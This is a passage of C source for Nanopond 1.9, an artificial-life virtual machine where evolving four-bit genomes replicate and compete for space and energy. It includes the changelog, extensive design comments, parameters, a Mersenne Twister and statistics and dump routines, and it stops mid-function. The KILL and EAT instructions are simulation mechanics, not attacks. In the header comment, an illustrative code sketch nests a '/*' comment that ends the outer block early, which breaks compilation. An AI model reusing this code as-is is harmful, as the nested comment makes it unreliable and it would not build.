/* *********************************************************************** */
/* */
/* Nanopond version 1.9 -- A teeny tiny artificial life virtual machine */
/* Copyright (C) 2005 <NAME> - http://www.greythumb.com/people/api */
/* */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or */
/* (at your option) any later version. */
/* */
/* This program is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with this program; if not, write to the Free Software */
/* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 USA */
/* */
/* *********************************************************************** */
/*
* Changelog:
*
* 1.0 - Initial release
* 1.1 - Made empty cells get initialized with 0xffff... instead of zeros
* when the simulation starts. This makes things more consistent with
* the way the output buf is treated for self-replication, though
* the initial state rapidly becomes irrelevant as the simulation
* gets going. Also made one or two very minor performance fixes.
* 1.2 - Added statistics for execution frequency and metabolism, and made
* the visualization use 16bpp color.
* 1.3 - Added a few other statistics.
* 1.4 - Replaced SET with KILL and changed EAT to SHARE. The SHARE idea
* was contributed by <NAME> (http://www.falma.de/). KILL
* is a variation on the original EAT that is easier for cells to
* make use of.
* 1.5 - Made some other instruction changes such as XCHG and added a
* penalty for failed KILL attempts. Also made access permissions
* stochastic.
* 1.6 - Made cells all start facing in direction 0. This removes a bit
* of artificiality and requires cells to evolve the ability to
* turn in various directions in order to reproduce in anything but
* a straight line. It also makes pretty graphics.
* 1.7 - Added more statistics, such as original lineage, and made the
* genome dump files CSV files as well.
* 1.8 - Fixed LOOP/REP bug reported by user Sotek. Thanks! Also
* reduced the default mutation rate a bit.
* 1.9 - Added a bunch of changes suggested by <NAME>: a better
* coloring algorithm, right click to switch coloring schemes (two
* are currently supported), and a few speed optimizations. Also
* changed visualization so that cells with generations less than 2
* are no longer shown.
* 1.9DR - Added a bunch of changes and features, some of which are not
* perfectly implemented yet: (1) New key inputs and display settings,
* e.g. =/- increase/decrease energy input. (2) Ability to save/read
* current run to/from a file, and do screenshots to a BMP file. These
* can be set to be done periodically, automatically. (3) Mutations of
* individual living cells, instead of replacement with random genomes.
* (4) Potential speed increases by using memset() and memcpy() instead
* of loops (?) (5) ALLOW_GENOME_WRITE_COMMANDS flag turns on/off the
* commands which allow a cell to write to its own genome (WRITEG, XCHG).
* (6) Updated method for determining if cell is "viable". (7) New
* display modes: LOGO and ENERGY (ENERGY is not working correctly).
* (8) Some code reshuffling, e.g. moved cell execution loop to
* executeCell() function. (9) Replaced TURN command with EJECT, eject
* output buffer into neighbor, potentially at a non-zero genome location
* (could allow for parasite/viral/sexual types of behavior). (10)
* added instructions below for compiling on Mac OSX.
*/
/*
* Nanopond is just what it says: a very very small and simple artificial
* life virtual machine.
*
* It is a "small evolving program" based artificial life system of the same
* general class as Tierra, Avida, and Archis. It is written in very tight
* and efficient C code to make it as fast as possible, and is so small that
* it consists of only one .c file.
*
* How Nanopond works:
*
* The Nanopond world is called a "pond." It is an NxN two dimensional
* array of Cell structures, and it wraps at the edges (it's toroidal).
* Each Cell structure consists of a few attributes that are there for
* statistics purposes, an energy level, and an array of POND_DEPTH
* four-bit values. (The four-bit values are actually stored in an array
* of machine-size words.) The array in each cell contains the genome
* associated with that cell, and POND_DEPTH is therefore the maximum
* allowable size for a cell genome.
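*
* For example, with 64-bit machine words each uintptr_t holds 16 codons,
* and codon i of a genome can be unpacked like this (an illustrative
* sketch using names defined later in this file):
*
*   uintptr_t codonsPerWord = SYSWORD_BITS / 4;  /* 16 on 64-bit */
*   uintptr_t inst = (genome[i / codonsPerWord]
*                     >> ((i % codonsPerWord) * 4)) & 0xf;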
*
* The first four bit value in the genome is called the "logo." What that is
* for will be explained later. The remaining four bit values each code for
* one of 16 instructions. Instruction zero (0x0) is NOP (no operation) and
* instruction 15 (0xf) is STOP (stop cell execution). Read the code to see
* what the others are. The instructions are exceptionless and lack fragile
* operands. This means that *any* arbitrary sequence of instructions will
* always run and will always do *something*. This is called an evolvable
* instruction set, because programs coded in an instruction set with these
* basic characteristics can mutate. The instruction set is also
* Turing-complete, which means that it can theoretically do anything any
* computer can do. If you're curious, the instruction set is based on this:
* http://www.muppetlabs.com/~breadbox/bf/ (Brainfuck)
*
* At the center of Nanopond is a core loop. Each time this loop executes,
* a clock counter is incremented and one or more things happen:
*
* - Every REPORT_FREQUENCY clock ticks a line of comma-separated output
* is printed to STDOUT with some statistics about what's going on.
* - Every DUMP_FREQUENCY clock ticks, all viable replicators (cells whose
* generation is >= 2) are dumped to a file on disk.
* - Every INFLOW_FREQUENCY clock ticks a random x,y location is picked,
* energy is added (see INFLOW_RATE_MEAN and INFLOW_RATE_DEVIATION)
* and its genome is filled with completely random bits. Statistics
* are also reset to generation==0 and parentID==0 and a new cell ID
* is assigned.
* - Every tick a random x,y location is picked and the genome inside is
* executed until a STOP instruction is encountered or the cell's
* energy counter reaches zero. (Each instruction costs one unit energy.)
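*
* In rough pseudo-C the core loop therefore has this shape (a sketch of
* the structure only; seedRandomCell and pickRandomCellAndExecute are
* placeholder names, not functions in this file):
*
*   for(;;) {
*     ++clock;
*     if (!(clock % REPORT_FREQUENCY)) doReport(stdout,clock);
*     if (!(clock % INFLOW_FREQUENCY)) seedRandomCell();
*     pickRandomCellAndExecute();
*   }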
*
* The cell virtual machine is an extremely simple register machine with
* a single four bit register, one memory pointer, one spare memory pointer
* that can be exchanged with the main one, and an output buffer. When
* cell execution starts, this output buffer is filled with all binary 1's
* (0xffff....). When cell execution is finished, if the first byte of
* this buffer is *not* 0xff, then the VM says "hey, it must have some
* data!". This data is a candidate offspring; to reproduce cells must
* copy their genome data into the output buffer.
*
* When the VM sees data in the output buffer, it looks at the cell
* adjacent to the cell that just executed and checks whether or not
* the cell has permission (see below) to modify it. If so, then the
* contents of the output buffer replace the genome data in the
* adjacent cell. Statistics are also updated: parentID is set to the
* ID of the cell that generated the output and generation is set to
* one plus the generation of the parent.
*
* A cell is permitted to access a neighboring cell if:
* - That cell's energy is zero
* - That cell's parentID is zero
* - That cell's logo (remember?) matches the trying cell's "guess"
*
* Since randomly introduced cells have a parentID of zero, this allows
* real living cells to always replace them or eat them.
*
* The "guess" is merely the value of the register at the time that the
* access attempt occurs.
*
* Permissions determine whether or not an offspring can take the place
* of the contents of a cell and also whether or not the cell is allowed
* to EAT (an instruction) the energy in its neighbor.
*
* If you haven't realized it yet, this is why the final permission
* criteria is comparison against what is called a "guess." In conjunction
* with the ability to "eat" neighbors' energy, guess what this permits?
*
* Since this is an evolving system, there have to be mutations. The
* MUTATION_RATE sets their probability. Mutations are random variations
* with a frequency defined by the mutation rate to the state of the
* virtual machine while cell genomes are executing. Since cells have
* to actually make copies of themselves to replicate, this means that
* these copies can vary if mutations have occurred to the state of the
* VM while copying was in progress.
*
* What results from this simple set of rules is an evolutionary game of
* "corewar." In the beginning, the process of randomly generating cells
* will cause self-replicating viable cells to spontaneously emerge. This
* is something I call "random genesis," and happens when some of the
* random gak turns out to be a program able to copy itself. After this,
* evolution by natural selection takes over. Since natural selection is
* most certainly *not* random, things will start to get more and more
* ordered and complex (in the functional sense). There are two commodities
* that are scarce in the pond: space in the NxN grid and energy. Evolving
* cells compete for access to both.
*
* If you want more implementation details such as the actual instruction
* set, read the source. It's well commented and is not that hard to
* read. Most of its complexity comes from the fact that four-bit values
* are packed into machine size words by bit shifting. Once you get that,
* the rest is pretty simple.
*
* Nanopond, for all its simplicity, manifests some really interesting
* evolutionary dynamics. While I haven't run the kind of multiple-
* month-long experiment necessary to really see this (I might!), it
* would appear that evolution in the pond doesn't get "stuck" on just
* one or a few forms the way some other simulators are apt to do.
* I think simplicity is partly responsible for this along with what
* biologists call embeddedness, which means that the cells are a part
* of their own world.
*
* Run it for a while... the results can be... interesting!
*
* Running Nanopond:
*
* Nanopond can use SDL (Simple DirectMedia Layer) for screen output. If
* you don't have SDL, comment out USE_SDL below and you'll just see text
* statistics and get genome data dumps. (Turning off SDL will also speed
* things up slightly.)
*
* After looking over the tunable parameters below, compile Nanopond and
* run it. Here are some example compilation commands from Linux:
*
* For Pentiums:
* gcc -O6 -march=pentium -funroll-loops -fomit-frame-pointer -s
* -o nanopond nanopond.c -lSDL
*
* For Athlons with gcc 4.0+:
* gcc -O6 -msse -mmmx -march=athlon -mtune=athlon -ftree-vectorize
* -funroll-loops -fomit-frame-pointer -o nanopond nanopond.c -lSDL
*
* On Mac OS X, I have done it using Fink's version of SDL:
* gcc -fast -floop-optimize -finline-functions -fstrength-reduce -o nanopond
* nanopond-1.9.c -lSDL -lSDLmain -I/sw/include -L/sw/lib -framework Cocoa
* -OR-
* gcc -fast -floop-optimize -finline-functions -fstrength-reduce
* -o nanopond nanopond-1.9.c -D_MSC_VER
* `/sw/bin/sdl-config --prefix=/sw --libs --cflags`
*
* The second line is for gcc 4.0 or newer and makes use of GCC's new
* tree vectorizing feature. This will speed things up a bit by
* compiling a few of the loops into MMX/SSE instructions.
*
* This should also work on other POSIX-compliant OSes with relatively
* new C compilers. (Really old C compilers will probably not work.)
* On other platforms, you're on your own! On Windows, you will probably
* need to find and download SDL if you want pretty graphics and you
* will need a compiler. MinGW and Borland's BCC32 are both free. I
* would actually expect those to work better than Microsoft's compilers,
* since MS tends to ignore C/C++ standards. If stdint.h isn't around,
* you can fudge it like this:
*
* #define uintptr_t unsigned long (or whatever your machine size word is)
* #define uint8_t unsigned char
* #define uint16_t unsigned short
* #define uint64_t unsigned long long (or whatever is your 64-bit int)
*
* When Nanopond runs, comma-separated stats (see doReport() for
* the columns) are output to stdout and various messages are output
* to stderr. For example, you might do:
*
* ./nanopond >>stats.csv 2>messages.txt &
*
* To get both in separate files.
*
* <plug>
* Be sure to visit http://www.greythumb.com/blog for your dose of
* technobiology related news. Also, if you're ever in the Boston
* area, visit http://www.greythumb.com/bostonalife to find out when
* our next meeting is!
* </plug>
*
* Have fun!
*/
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* Iteration to stop at. Comment this out to run forever. */
/* #define STOP_AT 150000000000ULL */
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 800 //640
#define POND_SIZE_Y 600 //480
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. */
#define REPORT_FREQUENCY ( 20 * POND_SIZE_X * POND_SIZE_Y ) /*10000000*/
/* Frequency at which to dump all viable replicators (generation >= 2)
* to a file named <clock>.dump in the current directory. Comment
* out to disable. The cells are dumped in hexadecimal, which is
* semi-human-readable if you look at the big switch() statement
* in the main loop to see what instruction is signified by each
* four-bit value. */
/* #define DUMP_FREQUENCY ( 10 * REPORT_FREQUENCY ) */ /* 100000000 */
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
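/* Worked example: p = 0.000005 gives 0.000005 * 4294967295 ~= 21475,
 * which is the default value below. */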
#define MUTATION_RATE 21475 /* p=~0.000005 */
/* How frequently should random cells / energy be introduced?
* Making this too high makes things very chaotic. Making it too low
* might not introduce enough energy. */
#define INFLOW_FREQUENCY 100
/* Base amount of energy to introduce per INFLOW_FREQUENCY ticks */
#define INFLOW_RATE_BASE 4000
/* A random amount of energy between 0 and this is added to
* INFLOW_RATE_BASE when energy is introduced. Comment this out for
* no variation in inflow rate. */
#define INFLOW_RATE_VARIATION 8000
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 512
/* This is the divisor that determines how much energy is taken
* from cells when they try to KILL a viable cell neighbor and
* fail. Higher numbers mean lower penalties. */
#define FAILED_KILL_PENALTY 2
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* This is the frequency of screen refreshes if SDL is enabled. */
#define SDL_UPDATE_FREQUENCY (POND_SIZE_X * POND_SIZE_Y / 2) /*200000*/
/* This says enable commands which allow the cell to modify its own genome */
#define ALLOW_GENOME_WRITE_COMMANDS 1
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_SDL
#ifdef _MSC_VER
#include <unistd.h> /* for the pause function */
#include <SDL.h>
#else
#include <SDL/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
/* ----------------------------------------------------------------------- */
/* This is the Mersenne Twister by <NAME> and <NAME> */
/* http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/MT2002/emt19937ar.html */
/* ----------------------------------------------------------------------- */
/* A few very minor changes were made by me - Adam */
/*
A C-program for MT19937, with initialization improved 2002/1/26.
Coded by <NAME> and <NAME>.
Before using, initialize the state by using init_genrand(seed)
or init_by_array(init_key, key_length).
Copyright (C) 1997 - 2002, <NAME> and <NAME>,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The names of its contributors may not be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Any feedback is very welcome.
http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html
email: m-<EMAIL> (remove space)
*/
/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */
static unsigned long mt[N]; /* the array for the state vector */
static int mti=N+1; /* mti==N+1 means mt[N] is not initialized */
/* initializes mt[N] with a seed */
static void init_genrand(unsigned long s)
{
mt[0]= s & 0xffffffffUL;
for (mti=1; mti<N; mti++) {
mt[mti] =
(1812433253UL * (mt[mti-1] ^ (mt[mti-1] >> 30)) + mti);
/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
/* In the previous versions, MSBs of the seed affect */
/* only MSBs of the array mt[]. */
/* 2002/01/09 modified by <NAME> */
mt[mti] &= 0xffffffffUL;
/* for >32 bit machines */
}
}
/* generates a random number on [0,0xffffffff]-interval */
static inline uint32_t genrand_int32()
{
uint32_t y;
static uint32_t mag01[2]={0x0UL, MATRIX_A};
/* mag01[x] = x * MATRIX_A for x=0,1 */
if (mti >= N) { /* generate N words at one time */
int kk;
for (kk=0;kk<N-M;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+M] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
for (;kk<N-1;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+(M-N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
y = (mt[N-1]&UPPER_MASK)|(mt[0]&LOWER_MASK);
mt[N-1] = mt[M-1] ^ (y >> 1) ^ mag01[y & 0x1UL];
mti = 0;
}
y = mt[mti++];
/* Tempering */
y ^= (y >> 11);
y ^= (y << 7) & 0x9d2c5680UL;
y ^= (y << 15) & 0xefc60000UL;
y ^= (y >> 18);
return y;
}
/* ----------------------------------------------------------------------- */
/* Pond depth in machine-size words. This is calculated from
* POND_DEPTH and the size of the machine word. (The multiplication
* by two is due to the fact that there are two four-bit values in
* each eight-bit byte.) */
#define POND_DEPTH_SYSWORDS (POND_DEPTH / (sizeof(uintptr_t) * 2))
#define POND_DEPTH_BYTES (POND_DEPTH / 2)
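/* Worked example: with POND_DEPTH 512 and 8-byte (64-bit) machine words,
 * POND_DEPTH_SYSWORDS = 512 / 16 = 32 and POND_DEPTH_BYTES = 256. */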
/* Number of bits in a machine-size word */
#define SYSWORD_BITS (sizeof(uintptr_t) * 8)
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
/* Word and bit at which to start execution */
/* This is after the "logo" */
#define EXEC_START_WORD 0
#define EXEC_START_BIT 4
/* Number of bits set in binary numbers 0000 through 1111 */
static const uintptr_t BITS_IN_FOURBIT_WORD[16] = { 0,1,1,2,1,2,2,3,1,2,2,3,2,3,3,4 };
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* ID of the cell's parent */
uint64_t parentID;
/* Counter for original lineages -- equal to the cell ID of
* the first cell in the line. */
uint64_t lineage;
/* Generations start at 0 and are incremented from there. */
uintptr_t generation;
/* Count number of children this cell has spawned. */
uintptr_t children;
/* Energy level of this cell */
uintptr_t energy;
/* Memory space for cell genome (genome is stored as four
* bit instructions packed into machine size words) */
uintptr_t genome[POND_DEPTH_SYSWORDS];
};
/* The pond is a 2D array of cells */
struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* Currently selected color scheme */
enum { KINSHIP,LOGO,LINEAGE,ENERGY,MAX_COLOR_SCHEME } colorScheme = KINSHIP;
const char *colorSchemeName[4] = { "KINSHIP", "LOGO", "LINEAGE", "ENERGY" };
/**
* Get a random number
*
* @return Random number
*/
static inline uintptr_t getRandom()
{
/* A good optimizing compiler should optimize out this if */
/* This is to make it work on 64-bit boxes */
if (sizeof(uintptr_t) == 8)
return (uintptr_t)((((uint64_t)genrand_int32()) << 32) ^ ((uint64_t)genrand_int32()));
else return (uintptr_t)genrand_int32();
}
/**
* Structure for keeping some running tally type statistics
*/
struct PerReportStatCounters
{
/* Counts for the number of times each instruction was
* executed since the last report. */
double instructionExecutions[16];
/* Number of cells executed since last report */
double cellExecutions;
/* Number of viable cells replaced by other cells' offspring */
uintptr_t viableCellsReplaced;
/* Number of viable cells KILLed */
uintptr_t viableCellsKilled;
/* Number of successful SHARE operations */
uintptr_t viableCellShares;
};
/* Global statistics counters */
struct PerReportStatCounters statCounters;
/**
* Function to decide if a cell is "viable" or not
*
* @param c Cell to determine if viable
*/
static inline int cellIsViable(struct Cell *const c)
{
return ( c->generation > 1 && c->children ) ? 1 : 0;
}
/**
* Function to decide if a cell is "alive" or not (i.e. viable with energy)
*
* @param c Cell to determine if viable
*/
static inline int cellIsAlive(struct Cell *const c)
{
return ( c->generation > 1 && c->children && c->energy ) ? 1 : 0;
}
/**
* Output a line of comma-separated statistics data
*
* @param clock Current clock
*/
static void doReport(FILE *file, const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalActiveCells = 0;
uint64_t totalEnergy = 0;
uint64_t totalViableReplicators = 0;
uintptr_t maxGeneration = 0;
uintptr_t maxChildren = 0;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
struct Cell *const c = &pond[x][y];
if (c->energy) {
++totalActiveCells;
totalEnergy += (uint64_t)c->energy;
if ( cellIsViable( c ) )
++totalViableReplicators;
if (c->generation > maxGeneration)
maxGeneration = c->generation;
if (c->children > maxChildren)
maxChildren = c->children;
}
}
}
/* Look here to get the columns in the CSV output */
/* The first five are here and are self-explanatory */
fprintf(file, "%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu",
(uint64_t)clock,
(uint64_t)totalEnergy,
(uint64_t)totalActiveCells,
(uint64_t)totalViableReplicators,
(uint64_t)maxGeneration,
(uint64_t)maxChildren,
(uint64_t)statCounters.viableCellsReplaced,
(uint64_t)statCounters.viableCellsKilled,
(uint64_t)statCounters.viableCellShares
);
/* The next 16 are the average frequencies of execution for each
* instruction per cell execution. */
double totalMetabolism = 0.0;
for(x=0;x<16;++x) {
totalMetabolism += statCounters.instructionExecutions[x];
fprintf(file,",%.4f",(statCounters.cellExecutions > 0.0) ? (statCounters.instructionExecutions[x] / statCounters.cellExecutions) : 0.0);
}
/* The last column is the average metabolism per cell execution */
fprintf(file,",%.4f\n",(statCounters.cellExecutions > 0.0) ? (totalMetabolism / statCounters.cellExecutions) : 0.0);
fflush(file/*stdout*/);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
/* Reset per-report stat counters */
memset( &statCounters, 0, sizeof( statCounters ) );
}
/**
* Gets the color that a cell should be
*
* @param c Cell to get color for
* @return 8-bit color value
*/
#ifdef USE_SDL
static inline uint8_t getColor(struct Cell *c)
{
uintptr_t i,j,word,sum,opcode;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
uintptr_t skipnext;
#endif
if (c->energy) {
switch(colorScheme) {
case KINSHIP:
/*
* Kinship color scheme by <NAME>
*
* For cells of generation > 1, saturation and value are set to maximum.
* Hue is a hash-value with the property that related genomes will have
* similar hue (but of course, as this is a hash function, totally
* different genomes can also have a similar or even the same hue).
* Therefore the difference in hue should to some extent reflect the grade
* of "kinship" of two cells.
*/
if ( cellIsAlive( c ) ) { //c->generation ) { //
sum = 0;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
skipnext = 0;
#endif
for(i=0;i<4/*POND_DEPTH_SYSWORDS*/&&(c->genome[i] != ~((uintptr_t)0));++i) {
word = c->genome[i];
for(j=0;j<SYSWORD_BITS/4;++j,word >>= 4) {
/* We ignore 0xf's here, because otherwise very similar genomes
* might get quite different hash values in the case when one of
* the genomes is slightly longer and uses one more machine
* word. */
opcode = word & 0xf;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
if (skipnext)
skipnext = 0;
else {
#endif
if (opcode != 0xf)
sum += opcode;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
if (opcode == 0xc) /* 0xc == XCHG */
skipnext = 1; /* Skip "operand" after XCHG */
#endif
#ifdef ALLOW_GENOME_WRITE_COMMANDS
}
#endif
}
}
/* For the hash-value use a wrapped around sum of the sum of all
* commands and the length of the genome. */
return (uint8_t)((sum % 192) + 64);
}
return 0;
case LOGO:
/*
* Cells with generation > 1 are color-coded by their logo.
*/
return ( cellIsAlive( c ) ) ? //c->generation ) ?
(((uint8_t)c->genome[0]) | (uint8_t)1) : 0;
case LINEAGE:
/*
* Cells with generation > 1 are color-coded by lineage.
*/
return ( cellIsAlive( c ) ) ? //c->generation ) ?
(((uint8_t)c->lineage) | (uint8_t)1) : 0;
case ENERGY:
/*
* Plot the energy available in each cell as a grey-scale.
*/
return (((uint8_t)c->energy) & (uint8_t)0xff);
case MAX_COLOR_SCHEME:
/* ... never used... to make compiler shut up. */
break;
}
}
return 0; /* Cells with no energy are black */
}
#endif
/**
* Dumps the genome of a cell to a file.
*
* @param file Destination
* @param cell Source
* @param x X coord of cell
* @param y Y coord of cell
* @param findClosest boolean - find the closest cell to (x,y) that's alive?
*/
static int dumpCell(FILE *file, struct Cell *cell, uintptr_t x, uintptr_t y, int findClosest)
{
uintptr_t wordPtr,shiftPtr,inst,stopCount,i;
uint8_t color;
/* Find cell closest to this one if this one is not alive (for mouse presses, mostly) */
if ( findClosest && ! ( cellIsAlive( cell ) ) ) {
i = 0;
while( i ++ < 5 && ! ( cellIsAlive( cell ) ) ) {
/* Wrap at the edges (the pond is toroidal) so the search never
 * reads outside the pond array. */
uintptr_t xp = (x+i) % POND_SIZE_X, xm = (x+POND_SIZE_X-i) % POND_SIZE_X;
uintptr_t yp = (y+i) % POND_SIZE_Y, ym = (y+POND_SIZE_Y-i) % POND_SIZE_Y;
cell = &pond[xp][y]; if ( cellIsAlive( cell ) ) break;
cell = &pond[xm][y]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x][yp]; if ( cellIsAlive( cell ) ) break;
cell = &pond[x][ym]; if ( cellIsAlive( cell ) ) break;
cell = &pond[xp][yp]; if ( cellIsAlive( cell ) ) break;
cell = &pond[xm][ym]; if ( cellIsAlive( cell ) ) break;
cell = &pond[xm][yp]; if ( cellIsAlive( cell ) ) break;
cell = &pond[xp][ym]; if ( cellIsAlive( cell ) ) break;
}
}
if ( cellIsAlive( cell ) ) {
fprintf(file,"%d,%d,%llu,%llu,%llu,%llu,%llu,%llu,",
(int)x, (int)y,
(uint64_t)cell->ID,
(uint64_t)cell->parentID,
(uint64_t)cell->lineage,
(uint64_t)cell->generation,
(uint64_t)cell->children,
(uint64_t)cell->energy);
#ifdef USE_SDL
color = getColor(cell);
#else
color = cell->genome[0];
#endif
fprintf(file,"%2x,",color);
wordPtr = 0;
shiftPtr = 0;
stopCount = 0;
for(i=0;i<POND_DEPTH;++i) {
inst = (cell->genome[wordPtr] >> shiftPtr) & 0xf;
/* Four STOP instructions in a row is considered the end.
* The probability of this being wrong is *very* small, and
* could only occur if you had four STOPs in a row inside
* a LOOP/REP pair that's always false. In any case, this
* would always result in our *underestimating* the size of
* the genome and would never result in an overestimation. */
fprintf(file,"%x",inst);
if (inst == 0xf) { /* STOP */
if (++stopCount >= 4)
break;
} else stopCount = 0;
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
}
fprintf(file,"\n");
return( 1 );
}
return( 0 );
}
/**
* Dumps all viable (generation >= 2) cells to a file called <clock>.dump
*
* @param clock Clock value
*/
static int doDump(const uint64_t clock)
{
char buf[POND_DEPTH*2];
FILE *d;
uintptr_t x,y;
int ok;
if ( clock == 0 ) return( 0 );
sprintf(buf,"%012llu.dump.csv",clock);
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return( 0 );
}
ok = 0;
for(x=0;x<POND_SIZE_X;++x)
for(y=0;y<POND_SIZE_Y;++y)
if (dumpCell(d, &pond[x][y], x, y, 0)) ok = 1;
fclose(d);
if ( !ok ) remove( buf );
else fprintf(stderr,"[INFO] Dumping viable cells to %s\n",buf);
return( ok );
}
/**
* Save a screen shot to a bitmap (bmp) file.
*
* @param clock Clock value
* @param screen SDL screen pointer
*/
#ifdef USE_SDL
static void doScreenshot(const uint64_t clock, SDL_Surface *screen)
{
char buf[POND_DEPTH*2];
if ( clock == 0 ) return;
sprintf(buf,"%012llu.scrn.bmp",clock);
fprintf(stderr,"[INFO] Saving screenshot to %s\n",buf);
SDL_SaveBMP(screen, buf);
}
static void doSaveOpen(const int8_t saveOpen, uint64_t *clock, uint64_t *cellIdCounter)
{
char buf[POND_DEPTH*2];
int i;
FILE *d = NULL;
if ( *clock == 0 ) return;
sprintf(buf,"%012llu.dump.bin",*clock);
if ( saveOpen == 's' ) {
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
fprintf(stderr,"[INFO] Saving memory dump to %s\n",buf);
fwrite( clock, sizeof(uint64_t), 1, d );
fwrite( cellIdCounter, sizeof(uint64_t), 1, d );
fwrite( &statCounters, sizeof(struct PerReportStatCounters), 1, d );
for (i=0; i<POND_SIZE_X; i++ )
fwrite( &(pond[i][0]), sizeof(struct Cell), POND_SIZE_Y, d );
} else if ( saveOpen == 'o' ) {
d = fopen(buf,"r");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for reading.\n",buf);
return;
}
fprintf(stderr,"[INFO] Reading memory dump from %s\n",buf);
fread( clock, sizeof(uint64_t), 1, d );
fread( cellIdCounter, sizeof(uint64_t), 1, d );
fread( &statCounters, sizeof(struct PerReportStatCounters), 1, d );
for (i=0; i<POND_SIZE_X; i++ )
fread( &(pond[i][0]), sizeof(struct Cell), POND_SIZE_Y, d );
}
if (d != NULL) fclose(d);
}
#endif /* USE_SDL */
/*
 * Resetting lives in its own function so it can be called at startup and
 * by the 'r' key press. (It is needed even when SDL is disabled, so it
 * sits outside the USE_SDL block.)
 */
static void reset() {
	uintptr_t x,y;
	for(x=0;x<POND_SIZE_X;++x) {
		for(y=0;y<POND_SIZE_Y;++y) {
			pond[x][y].ID = pond[x][y].parentID = pond[x][y].lineage = 0;
			pond[x][y].generation = pond[x][y].children = pond[x][y].energy = 0;
			memset( pond[x][y].genome, 0xff, POND_DEPTH_BYTES );
		}
	}
	/* Reset per-report stat counters */
	memset( &statCounters, 0, sizeof( statCounters ) );
}
/**
* Get a neighbor in the pond
*
* @param x Starting X position
* @param y Starting Y position
* @param dir Direction to get neighbor from
* @return Pointer to neighboring cell
*/
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
